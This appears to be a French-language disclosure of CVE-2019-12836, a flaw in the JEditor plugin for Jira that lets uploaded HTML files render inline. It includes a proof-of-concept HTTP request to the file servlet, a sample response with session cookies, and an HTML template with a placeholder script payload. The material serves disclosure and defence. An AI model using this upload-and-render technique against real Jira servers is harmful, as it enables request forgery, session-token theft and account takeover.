
CVE-2019-12836

JEditor v3.0.5 - Éditeur WYSIWIG pour JIRA
Éditeur de texte riche simple mais puissant pour Jira. Importez des e-mails HTML, collez du contenu riche, créez des modèles et préremplissez les champs.
Bobronix
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836
JEditor - Éditeur WYSIWYG pour Jira - v3.0.5
JEditor v3.0.5
L'éditeur Bobronix JEditor avant la v3.0.6 pour Jira permet à un attaquant d'ajouter une URL/un lien (vers un problème existant) qui peut provoquer la falsification d'une requête vers un domaine d'origine externe. Cela peut à son tour permettre une requête falsifiée pouvant être invoquée dans le contexte d'un utilisateur authentifié, conduisant au vol de jetons de session et à la prise de contrôle du compte.
JEditor v3.0.5 permet le téléchargement de fichiers de divers types d'extension, dont l'un est '.HTML'. JEditor est utilisé par JIRA pour sa fonctionnalité de téléchargement de fichiers. En utilisant cette fonctionnalité, un attaquant peut télécharger du contenu malveillant.
Une fois le contenu malveillant téléchargé, une requête ultérieure peut être faite pour ce contenu, ce qui permet l'affichage et le rendu en ligne du contenu dans le contexte du navigateur de tout utilisateur authentifié. Cela peut permettre à un attaquant de forger une requête malveillante au nom de tout utilisateur authentifié.
Cross-Site Request Forgery (CSRF)
Bug corrigé dans JEditor v3.0.6
https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes
Permet une requête falsifiée entraînant une possibilité de vecteur d'attaque côté client
Un utilisateur authentifié est nécessaire pour interagir avec le lien/URL intégré
Crédit : Victor Hanna (Exploit Security)
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236
<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
Welcome to the Jungle !
</h1>
</body>
</html>
Victor Hanna d'Exploit Security